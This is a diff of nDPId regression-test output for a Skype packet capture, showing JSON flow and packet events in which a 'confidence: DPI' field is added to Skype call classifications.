+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969781598,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969783628,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969783628,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969783628,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJsBAAEAG06bAqAEiUA4uecPdET\/5wLoiAAAAALAC\/\/9\/YwAAAgQFtAEDAwUBAQgKPiSwIwAAAAAEAgAA"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1431969783723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969783723,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoepAAHQGJHxQDi55wKgBIhE\/w92tjxb3+cC6I7AS\/\/+oHwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"}
@@ -1235,23 +1234,23 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3185,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1431969789832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969789832,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcbhAAEAG1ffAqAEiTsric8PgcYPYQ6AmAAAAALAC\/\/+PtQAAAgQFtAEDAwUBAQgKPiTITAAAAAAEAgAA"}
 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1431969789851,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1431969789851,"pkt":"AQBeAAD7PBXCt3IOCABGAAAgDOsAAAECdSfAqAEi4AAA+5QEAAAWAAkE4AAA+w=="}
